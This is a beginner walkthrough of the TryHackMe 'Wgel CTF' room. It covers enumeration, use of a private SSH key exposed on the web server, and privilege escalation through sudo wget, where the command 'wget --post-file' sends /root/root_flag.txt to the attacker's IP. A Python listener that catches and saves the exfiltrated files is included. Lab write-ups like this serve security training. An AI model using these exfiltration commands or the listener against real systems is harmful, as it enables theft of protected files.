Wgel CTF — TryHackMe Walkthrough
Hello everyone! Today I'll be solving the Wgel CTF room on TryHackMe. It is an easy-rated room, which makes it a good starting point for beginners who want to kickstart their CTF experience.
Room Link: https://tryhackme.com/room/wgelctf
Let's get started!
Before starting off, map the target's IP address to the hostname wgel.ctf in the /etc/hosts file on the attack machine; the commands below use that hostname instead of the raw IP.
Step 0: Reconnaissance
We'll use nmap (Network Mapper) to enumerate the target and find out which services are exposed and what versions they run.
sudo nmap -sC -sV -oN logs/initial_nmap wgel.ctf
- -sC — to run the default set of script scans for a target host.
- -sV — to enable version detection for target host.
- -oN — to save the output in normal format.
Brief:
- 22/tcp — SSH (Secure Shell), used for remote access to the system. To use it we need valid credentials for a user on the box: a username together with a password or a private key.
- 80/tcp — HTTP, an Apache 2.4.18 web server.
Step 1: Exploring the web server
Let's fire up the browser and check what the web server has.
It is the default Apache page. Nothing interesting here, so we need to search for hidden directories with gobuster.
And we get a /sitemap directory. A sitemap is normally a list of the pages of a website, published so that search-engine crawlers can index the site.
Now, let's explore the sitemap!
It is not an actual sitemap, just a website template from Colorlib. Let's search for hidden directories under /sitemap as well:
gobuster dir -u http://wgel.ctf/sitemap -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Bingo! We discovered a .ssh directory. On Linux systems, a user's .ssh directory holds their SSH keys and configuration files, and it should never be reachable through a web server.
As expected, it contains a private key (id_rsa). We can use it to log into the SSH server, so let's download it:
curl http://wgel.ctf/sitemap/.ssh/id_rsa -L -o artifacts/id_rsa
But wait a minute. Despite having the SSH key, we do not yet have a username to log in with. Let us go back to the root of the web server to look for evidence, if any.
Easy catch! Inspecting the source of the root page, we find an interesting comment in the HTML markup that mentions Jessie. Jessie is a likely username on the system, so let's try logging in with it.
Step 2: Getting access to the system
Now we can log into the SSH server with the username and key we found. First, restrict the permissions on id_rsa: ssh refuses to use a private key that is readable by other users, so set it to owner read/write only.
chmod 600 id_rsa
Then connect with the key:
ssh -i id_rsa jessie@wgel.ctf
And we’re in!
How about we grab the user flag?
find / -type f -name "*.txt" 2>/dev/null | grep -i flag
The pattern is quoted so the shell does not expand *.txt against the current directory before find sees it, and errors from unreadable directories are discarded.
First flag captured! Let's move on to the root flag.
Step 3: Privilege Escalation
Let us check which commands our current user, jessie, is allowed to run with root privileges through sudo:
sudo -l
jessie can run /usr/bin/wget as root. We can abuse this to read files that only root can access, using the wget technique documented on GTFOBins: wget will happily send any readable file to a URL we control.
On the attack machine, start a netcat listener on port 80 (HTTP, so the URL on the target needs no explicit port). Binding to a port below 1024 requires root on the attack box, so run it with sudo, or pick a high port and append it to the URL.
nc -nlvp 80
Then, on the target, make wget send the file as the body of an HTTP POST to our listener (replace 10.17.101.143 with your attack machine's IP):
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.17.101.143
On the attack machine, netcat prints the raw request; the contents of the root flag file appear after the request headers, as the POST body:
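The raw netcat listener works for a one-line flag, but it never answers, so wget on the target hangs until you close nc, and a longer file is mixed in with the request headers. Below is an added example (my code, not from the original walkthrough or from wget) of a small listener that parses the POST, saves the body under a loot directory named after the URL path, and replies 200 OK so the sudo'd wget exits cleanly. The port, the loot directory, and the sample data in the self-test are assumptions.

```python
"""Catcher for files exfiltrated with `wget --post-file=<path> http://ATTACKER:PORT/`.

Added example for this walkthrough, not part of the original post or of wget.
Instead of reading the raw request off `nc`, it parses the HTTP POST, saves the
body to disk and answers 200 OK so the sudo'd wget on the target exits cleanly.
The port, output directory and the constructed sample data are assumptions.
"""
import os
import sys
import tempfile
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class PostFileHandler(BaseHTTPRequestHandler):
    """Save every POST body under server.out_dir, named after the URL path."""

    def do_POST(self):
        # wget --post-file sets Content-Length to the file size; read exactly that many bytes.
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        # Drop any query string and directory parts so a crafted path cannot escape out_dir.
        name = os.path.basename(self.path.split("?", 1)[0].rstrip("/")) or "post"
        os.makedirs(self.server.out_dir, exist_ok=True)
        target = os.path.join(self.server.out_dir, name + ".bin")
        with open(target, "ab") as fh:
            fh.write(body)
        self.server.received.append((self.client_address[0], target, body))
        # Answer so wget on the target returns instead of waiting for a response.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        # One line per request; the body is saved to disk, not echoed to the terminal.
        print(f"[+] {self.client_address[0]} {self.command} {self.path}")


def start_listener(port=0, out_dir="loot", host="0.0.0.0"):
    """Start the catcher in a daemon thread; port 0 lets the OS pick a free port."""
    server = HTTPServer((host, port), PostFileHandler)
    server.out_dir = out_dir      # where bodies are written
    server.received = []          # (client ip, saved path, body) per request
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo_roundtrip(data):
    """Offline self-test: POST `data` to a local listener and return what it stored."""
    out_dir = tempfile.mkdtemp(prefix="loot-")
    server = start_listener(port=0, out_dir=out_dir, host="127.0.0.1")
    try:
        url = f"http://127.0.0.1:{server.server_port}/root_flag.txt"
        # Same request shape as `wget --post-file=root_flag.txt <url>`, without wget itself.
        req = urllib.request.Request(url, data=data, method="POST")
        with urllib.request.urlopen(req, timeout=5) as resp:
            if resp.status != 200:
                raise RuntimeError(f"unexpected status {resp.status}")
    finally:
        server.shutdown()
        server.server_close()
    _, target, body = server.received[0]
    with open(target, "rb") as fh:
        if fh.read() != body:
            raise RuntimeError("saved file does not match received body")
    return body


if __name__ == "__main__":
    # Usage: sudo python3 catcher.py 80   (sudo only needed for ports below 1024)
    listen_port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
    srv = start_listener(port=listen_port)
    print(f"[*] listening on :{srv.server_port}, saving POST bodies under loot/")
    threading.Event().wait()  # block until Ctrl-C; the server runs in its daemon thread
```

Run it as root on the attack box with port 80 to keep the target-side command exactly as above, or on a high port and point wget at http://10.17.101.143:8080/root_flag.txt; the path you choose becomes the file name under loot/.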
And with that, Wgel CTF has been successfully pwned!
Conclusion
Wgel CTF is a fairly easy room aimed at beginners and at anyone who wants to get experience with a basic CTF workflow: service enumeration, directory brute-forcing, an exposed private key, and a sudo misconfiguration.